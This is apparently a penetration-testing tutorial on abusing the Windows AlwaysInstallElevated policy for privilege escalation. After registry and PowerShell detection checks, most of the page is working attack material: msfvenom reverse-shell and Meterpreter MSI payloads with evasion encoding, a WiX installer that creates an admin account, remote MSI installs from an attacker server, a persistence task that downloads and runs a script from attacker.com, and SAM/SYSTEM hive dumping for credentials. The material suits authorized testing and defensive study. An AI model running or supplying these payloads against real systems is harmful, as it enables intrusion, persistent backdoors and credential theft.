Exploiting AlwaysInstallElevated
Understanding AlwaysInstallElevated
What Is AlwaysInstallElevated?
AlwaysInstallElevated is like giving a valet key that automatically starts any car to anyone who wants to "install software." Normally, installing software requires administrative privileges and triggers UAC prompts. However, when AlwaysInstallElevated is enabled, any user can install MSI packages with SYSTEM privileges without any prompts.
This Windows Group Policy setting was designed for environments where standard users need to install approved software without administrator intervention. However, it creates a significant security risk because any MSI package will be installed with the highest system privileges.
How AlwaysInstallElevated Works
Normal MSI Installation Process:
User attempts to install MSI package
Windows checks user privileges
If not administrator, UAC prompt appears
User must provide admin credentials
Installation proceeds with elevated privileges
With AlwaysInstallElevated Enabled:
User attempts to install MSI package
Windows automatically elevates to SYSTEM privileges
No UAC prompt or credential check
Installation proceeds with SYSTEM privileges immediately
If AlwaysInstallElevated is enabled, the user context determines MSI execution; local execution by a standard user will elevate the MSI to SYSTEM
The Security Risk
When AlwaysInstallElevated is enabled, any user can:
Install malicious MSI packages with SYSTEM privileges
Bypass UAC completely for MSI installations
Gain immediate administrative access to the system
Execute any code during the installation process as SYSTEM
Registry Configuration
AlwaysInstallElevated requires specific registry settings to be enabled:
Required Registry Keys:
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1Why Both Keys Are Required:
HKLM key - Enables the policy machine-wide
HKCU key - Enables the policy for the current user
Both must be set to 1 for the policy to take effect
This dual-key requirement was designed as a security measure, but in practice, both keys are often set when the policy is enabled via Group Policy.
Real-World Scenarios
Where AlwaysInstallElevated Is Commonly Found:
Educational institutions - Allow students to install approved software
Corporate environments - Let employees install business applications
Kiosk systems - Enable automated software deployment
Development environments - Allow developers to install tools
Why It's Dangerous: Even in controlled environments, this setting can be abused because:
Any MSI file can be executed, not just approved ones
Users can create malicious MSI packages
Remote attackers can leverage this for privilege escalation
No validation of MSI package contents occurs
Detection and Enumeration
Manual Registry Checks
Basic Registry Enumeration
Check if AlwaysInstallElevated is enabled:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedUnderstanding the output:
Value 0x1 (1) - AlwaysInstallElevated is enabled
Value 0x0 (0) - AlwaysInstallElevated is disabled
Key not found - Policy is not configured (disabled by default)
PowerShell registry check:
function Test-AlwaysInstallElevated {
try {
# Check HKLM key
$hklmValue = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
# Check HKCU key
$hkcuValue = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
$hklmEnabled = $hklmValue.AlwaysInstallElevated -eq 1
$hkcuEnabled = $hkcuValue.AlwaysInstallElevated -eq 1
Write-Output "[+] AlwaysInstallElevated Check Results:"
Write-Output "HKLM Setting: $(if($hklmEnabled){'Enabled'}else{'Disabled or Not Set'})"
Write-Output "HKCU Setting: $(if($hkcuEnabled){'Enabled'}else{'Disabled or Not Set'})"
if ($hklmEnabled -and $hkcuEnabled) {
Write-Output "[!] VULNERABLE: AlwaysInstallElevated is enabled!"
return $true
} else {
Write-Output "[-] Not vulnerable: AlwaysInstallElevated not configured"
return $false
}
} catch {
Write-Output "[-] Error checking AlwaysInstallElevated: $($_.Exception.Message)"
return $false
}
}
Test-AlwaysInstallElevatedGroup Policy Verification
Check Group Policy settings:
# View current Group Policy for Windows Installer
gpresult /h gp_report.html
# Open gp_report.html and search for "AlwaysInstallElevated"
# Alternative command-line method
gpresult /r | findstr /i "installer"PowerShell Group Policy check:
# Get Group Policy results for current user
$gpResult = gpresult /z 2>$null | Out-String
if ($gpResult -like "*AlwaysInstallElevated*") {
Write-Output "[!] AlwaysInstallElevated found in Group Policy"
} else {
Write-Output "[-] AlwaysInstallElevated not found in Group Policy"
}Automated Detection Tools
PowerUp Detection
Using PowerUp framework:
Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevatedWinPEAS Detection
Using WinPEAS for detection:
winpeas.exe systeminfo | findstr /i "AlwaysInstallElevated"
winpeas.exe quiet | findstr /i "installer"Metasploit Detection
Metasploit post-exploitation module:
# From meterpreter session
meterpreter > background
msf > use post/windows/gather/enum_applications
msf > set SESSION 1
msf > run
# Check for AlwaysInstallElevated specifically
msf > use post/multi/recon/local_exploit_suggester
msf > set SESSION 1
msf > runExploitation Techniques
Creating Malicious MSI Packages
Once AlwaysInstallElevated is confirmed, the next step is creating a malicious MSI package that will execute with SYSTEM privileges.
Method 1: Using MSFVenom
MSFVenom can generate malicious MSI packages directly:
Basic MSI payload generation:
# Generate reverse shell MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o malicious.msi
# Generate Meterpreter MSI
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o meterpreter.msi
# Generate command execution MSI
msfvenom -p windows/exec CMD="net user hacker Password123! /add && net localgroup administrators hacker /add" -f msi -o adduser.msiAdvanced MSI payload with evasion:
# Encoded payload to avoid detection
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -e x86/shikata_ga_nai -i 3 -o encoded.msi
# HTTPS Meterpreter for encrypted communication
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f msi -o https_shell.msiMethod 2: PowerShell MSI Creation
Creating MSI with PowerShell:
function New-MaliciousMSI {
param(
[string]$OutputPath = "C:\temp\malicious.msi",
[string]$Command = "cmd.exe /c net user pwned Password123! /add"
)
# This is a simplified example - real MSI creation requires proper tools
Write-Output "[+] Creating malicious MSI package..."
Write-Output "Output: $OutputPath"
Write-Output "Command: $Command"
# In practice, you would use WiX Toolset or similar tools
# This demonstrates the concept
$msiContent = @"
[Setup]
AppName=System Update
AppVersion=1.0
DefaultDirName={pf}\SystemUpdate
OutputBaseFilename=malicious
[Files]
Source: "payload.exe"; DestDir: "{app}"
[Run]
Filename: "cmd.exe"; Parameters: "/c $Command"; Flags: runhidden
"@
Write-Output "[!] MSI creation requires proper MSI authoring tools"
Write-Output "[!] Use msfvenom or WiX Toolset for actual MSI generation"
}Method 3: WiX Toolset MSI Creation
Using WiX Toolset for custom MSI:
<!-- malicious.wxs - WiX source file -->
<?xml version="1.0" encoding="UTF-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" Name="System Update" Language="1033" Version="1.0.0.0"
Manufacturer="Microsoft Corporation" UpgradeCode="12345678-1234-1234-1234-123456789012">
<Package InstallerVersion="200" Compressed="yes" InstallScope="perMachine" />
<Media Id="1" Cabinet="media1.cab" EmbedCab="yes" />
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="SystemUpdate" />
</Directory>
</Directory>
<ComponentGroup Id="ProductComponents" Directory="INSTALLLOCATION">
<Component Id="MainComponent" Guid="*">
<File Id="PayloadFile" Source="payload.exe" KeyPath="yes" />
</Component>
</ComponentGroup>
<Feature Id="ProductFeature" Title="System Update" Level="1">
<ComponentGroupRef Id="ProductComponents" />
</Feature>
<!-- Custom action to execute payload -->
<CustomAction Id="RunPayload"
ExeCommand="cmd.exe /c net user hacker Password123! /add && net localgroup administrators hacker /add"
Execute="deferred"
Impersonate="no" />
<InstallExecuteSequence>
<Custom Action="RunPayload" After="InstallFiles">NOT Installed</Custom>
</InstallExecuteSequence>
</Product>
</Wix>Compile WiX MSI:
# Compile the WiX source to MSI
candle.exe malicious.wxs
light.exe malicious.wixobj -o malicious.msiMSI Installation and Execution
Manual Installation
Install MSI package:
# Standard installation
msiexec /i malicious.msi /quiet
# Silent installation (no UI)
msiexec /i malicious.msi /qn
# Installation with logging
msiexec /i malicious.msi /qn /l*v install.logPowerShell MSI installation:
# Install MSI using PowerShell
Start-Process "msiexec.exe" -ArgumentList "/i malicious.msi /qn" -Wait
# Alternative method
$msiFile = "C:\temp\malicious.msi"
$arguments = "/i `"$msiFile`" /qn"
Start-Process "msiexec.exe" -ArgumentList $arguments -Wait -NoNewWindow
Write-Output "[+] MSI installation completed"Remote MSI Installation
Install MSI from remote location:
# Install from UNC path
msiexec /i "\\attacker-server\share\malicious.msi" /qn
# Install from HTTP (if allowed)
msiexec /i "http://attacker-server/malicious.msi" /qnPowerShell remote MSI:
# Download and install MSI
$msiUrl = "http://attacker-server/malicious.msi"
$localMsi = "$env:TEMP\update.msi"
try {
Invoke-WebRequest -Uri $msiUrl -OutFile $localMsi
Start-Process "msiexec.exe" -ArgumentList "/i `"$localMsi`" /qn" -Wait
Remove-Item $localMsi -Force
Write-Output "[+] Remote MSI installation completed"
} catch {
Write-Error "Failed to install remote MSI: $($_.Exception.Message)"
}Metasploit Integration
Metasploit AlwaysInstallElevated Module
Using Metasploit's built-in module:
# Use the AlwaysInstallElevated exploit
use exploit/windows/local/always_install_elevated
# Set session (from existing session)
set SESSION 1
# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4443
# Execute exploit
exploitManual Metasploit MSI Deployment
Generate and deploy MSI via Meterpreter:
# From meterpreter session
meterpreter > upload malicious.msi C:\\temp\\update.msi
meterpreter > shell
# Install MSI from shell
C:\> msiexec /i C:\temp\update.msi /qn
# Exit shell and check for new session
meterpreter > background
msf > sessions -lAdvanced Exploitation Techniques
Persistence via MSI
Create MSI for persistence:
# MSI that creates scheduled task for persistence
msfvenom -p windows/exec CMD="schtasks /create /tn 'SystemUpdate' /tr 'C:\Windows\System32\backdoor.exe' /sc onstart /ru SYSTEM /f" -f msi -o persistence.msiPowerShell persistence MSI:
# Command to embed in MSI for persistence
$persistenceCommand = @"
schtasks /create /tn "WindowsOptimizer" /tr "powershell.exe -WindowStyle Hidden -Command 'IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\")'" /sc onlogon /ru SYSTEM /f
"@
# Use this command when creating MSI with msfvenom
# msfvenom -p windows/exec CMD="$persistenceCommand" -f msi -o persistence.msiCredential Harvesting MSI
MSI for credential collection:
# MSI that dumps credentials
msfvenom -p windows/exec CMD="reg save HKLM\SAM C:\temp\sam.hiv && reg save HKLM\SECURITY C:\temp\security.hiv && reg save HKLM\SYSTEM C:\temp\system.hiv" -f msi -o dumpcreds.msiLast updated
Was this helpful?